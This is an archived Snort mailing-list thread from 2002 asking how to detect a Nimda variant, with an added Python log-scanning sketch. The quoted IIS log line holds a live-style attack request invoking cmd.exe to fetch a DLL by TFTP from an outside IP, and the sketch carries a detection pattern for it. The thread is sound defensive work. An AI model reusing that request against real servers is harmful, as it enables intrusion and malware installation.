Snort mailing list archives

RE: Httpodbc.dll


From: "Hicks, John" <JHicks () JUSTICE GC CA>
Date: Tue, 24 Dec 2002 10:34:31 -0500

This usually fits in with the CMD.exe Access attempts of most web-worms, but
this specific one, AFAIK, is Nimda.E.

HTH,
John Hicks

-----Original Message-----
From: Robert Reid [mailto:rreid () 1800FLOWERS com]
Sent: Monday, December 23, 2002 1:07 PM
To: 'snort-users () lists sourceforge net'
Subject: [Snort-users] Httpodbc.dll
Importance: High


Morning,

I have been seeing a lot of requests for "httpodbc.dll" in my IIS server
logs. From what I can gather it's a Nimda variant that uses the file name
httpodbc.dll for the trojan/listener it drops. I'm not concerned with the
attack itself, but my Snort boxes are not picking it up. Here is a snippet
from my logs:

2002-12-22 04:32:16 63.147.xxx.xxx - 192.168.xxx.xxx 80 GET /publish_notfound.asp 404;http://www/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.147.160.27%20GET%20cool.dll%20c:\httpodbc.dll 200 0 0 137 47 HTTP/1.0 - - -

Does a snort signature exist for this type of attack?

Thanks a million,

Robert



-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
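
As an added example (not code from either poster or from the Snort project), the Python sketch below shows a log-side check for the request quoted in the thread: it URL-decodes each IIS log entry, flags cmd.exe requests, and extracts the TFTP source host and the dropped file name. The field order is assumed from the quoted log line, the function names are hypothetical, and the second and third sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Field order assumed from the log line quoted in the thread (not read from a #Fields header).
FIELDS = ("date", "time", "c_ip", "user", "s_ip", "s_port",
          "method", "uri_stem", "uri_query", "status")

# Decoded command shape seen in the thread: tftp -i <host> GET <remote> <local>
TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+get\s+(\S+)\s+(\S+)", re.IGNORECASE)

def decode(value, rounds=3):
    """Turn '+' into spaces, then URL-decode until stable (handles re-encoded '%')."""
    value = value.replace("+", " ")
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect(line):
    """Return a finding dict for a cmd.exe request, or None for anything else."""
    parts = line.split()
    if line.startswith("#") or len(parts) < len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    # In the quoted entry the cmd.exe URL sits in the query field (after "404;"),
    # not in the stem, so both fields are searched together.
    target = decode(rec["uri_stem"] + " " + rec["uri_query"]).lower()
    if "cmd.exe" not in target:
        return None
    finding = {"when": rec["date"] + " " + rec["time"], "client": rec["c_ip"],
               "status": rec["status"], "tftp_host": None, "dropped_as": None}
    m = TFTP_RE.search(target)
    if m:
        finding["tftp_host"], finding["dropped_as"] = m.group(1), m.group(3)
    return finding

# First entry is the log line quoted in the thread; the other two are constructed.
SAMPLE_LOG = [
    r"2002-12-22 04:32:16 63.147.xxx.xxx - 192.168.xxx.xxx 80 GET /publish_notfound.asp "
    r"404;http://www/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.147.160.27%20GET%20cool.dll%20c:\httpodbc.dll "
    r"200 0 0 137 47 HTTP/1.0 - - -",
    "2002-12-22 04:33:01 10.0.0.5 - 10.0.0.80 80 GET /default.asp - 200 0 0 512 20 HTTP/1.0 - - -",
    "2002-12-22 04:34:10 10.0.0.9 - 10.0.0.80 80 GET /d/winnt/system32/cmd.exe /c+dir 404 0 0 300 30 HTTP/1.0 - - -",
]

def scan(lines):
    return [f for f in map(inspect, lines) if f]
```

scan(SAMPLE_LOG) returns two findings; only the first carries a TFTP host and a dropped file name, which are the values worth pivoting on when reviewing other logs.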

